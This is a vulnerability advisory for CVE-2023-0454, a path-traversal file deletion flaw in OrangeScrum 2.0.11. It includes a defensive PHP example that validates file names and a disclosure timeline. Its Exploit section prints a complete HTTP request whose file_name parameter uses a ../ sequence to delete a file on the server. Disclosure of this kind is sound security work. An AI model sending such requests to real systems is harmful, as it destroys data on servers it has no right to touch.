OrangeScrum 2.0.11 - Arbitrary File Delete via file_name

Summary

Name: OrangeScrum 2.0.11 - Arbitrary File Delete via file_name

Code name: Slushii

Product: OrangeScrum

Affected versions: 2.0.11

State: Public

Release Date: 2023-01-30

Vulnerability

Kind: Lack of data validation - Path Traversal

Rule: 063. Lack of data validation - Path Traversal

Remote: Yes

CVSSv3 Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

CVSSv3 Base Score: 8.1

Exploit available: No

CVE ID(s): CVE-2023-0454

Description

OrangeScrum version 2.0.11 allows an authenticated external attacker to delete arbitrary local files from the server. This is possible because the application uses an unsanitized attacker-controlled parameter to construct an internal path.

Vulnerability

This vulnerability occurs because the application uses an unsanitized attacker-controlled parameter to construct an internal path.
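The description above attributes the flaw to an unsanitized request parameter being joined into a filesystem path and handed to the delete call. The following is an added example, not OrangeScrum's own code, written in PHP (the language OrangeScrum is built in): a delete helper that restricts file_name to a bare name and verifies that the canonical path stays inside an assumed upload directory before unlinking; the function and directory names are assumptions.

```php
<?php
// Added example, not OrangeScrum's code. Replaces the vulnerable pattern
// (request parameter joined straight into a path that is then unlinked)
// with a guarded delete. The upload directory name is an assumption.

function safeDeleteUpload(string $uploadDir, string $fileName): bool
{
    // 1. The parameter must be a bare file name: no path separators,
    //    no "." / ".." components, no NUL bytes (which truncate C paths).
    if ($fileName === '' || $fileName === '.' || $fileName === '..'
        || strpbrk($fileName, '/\\') !== false
        || strpos($fileName, "\0") !== false) {
        return false;
    }

    // 2. Canonicalize both sides so "../" and symlinks cannot leave the base.
    $base   = realpath($uploadDir);
    $target = realpath($uploadDir . DIRECTORY_SEPARATOR . $fileName);
    if ($base === false || $target === false) {
        return false; // base directory missing, or file does not exist
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return false; // resolved path escaped the upload directory
    }

    // 3. Only regular files are ever removed, never directories or devices.
    return is_file($target) && unlink($target);
}

// Demonstration on a constructed temporary layout (nothing real is touched).
$root = sys_get_temp_dir() . '/os_demo_' . bin2hex(random_bytes(4));
mkdir("$root/uploads", 0700, true);
file_put_contents("$root/uploads/report.pdf", 'sample');
file_put_contents("$root/outside.txt", 'sample');
symlink("$root/outside.txt", "$root/uploads/link.txt");

$cases = ['../outside.txt', 'link.txt', "report.pdf\0.jpg", 'report.pdf'];
foreach ($cases as $name) {
    $ok = safeDeleteUpload("$root/uploads", $name);
    printf("%-20s deleted=%s\n", addcslashes($name, "\0"), $ok ? 'yes' : 'no');
}
printf("outside.txt still exists: %s\n",
    file_exists("$root/outside.txt") ? 'yes' : 'no');
```

Only the plain `report.pdf` case is removed; the traversal, symlink and NUL-byte variants are refused before any filesystem write happens.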

Exploit

To exploit this vulnerability, we only need to send the following malicious request to the server.

POST /projects/delete_file HTTP/1.1
Host: retr02332bughunter.orangescrum.com
Cookie: USER_UNIQ=1515f12e8e8fc20b7a103011dee82b89; USERTYP=2; USERTZ=49; USERSUB_TYPE=0;
User-Agent: Retr02332
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 96
Connection: close

file_name=../../../../../../../../../../../../../var/www/html/orangescrum/app/webroot/hacked.txt

Evidence of exploitation

Screenshots (images not reproduced): vulnerability-code, before-delete, delete-file-proxy, after-delete.

Our security policy

We have reserved the ID CVE-2023-0454 to refer to this issue from now on.

System Information

  • Version: OrangeScrum 2.0.11

  • Operating System: GNU/Linux

Mitigation

There is currently no patch available for this vulnerability.

Credits

The vulnerability was discovered by Carlos Bello from Fluid Attacks' Offensive Team.

References

Vendor page https://github.com/Orangescrum/orangescrum/

Timeline

2023-01-23: Vulnerability discovered.

2023-01-23: Vendor contacted.

2023-01-23: Vendor replied acknowledging the report.

2023-01-30: Public Disclosure.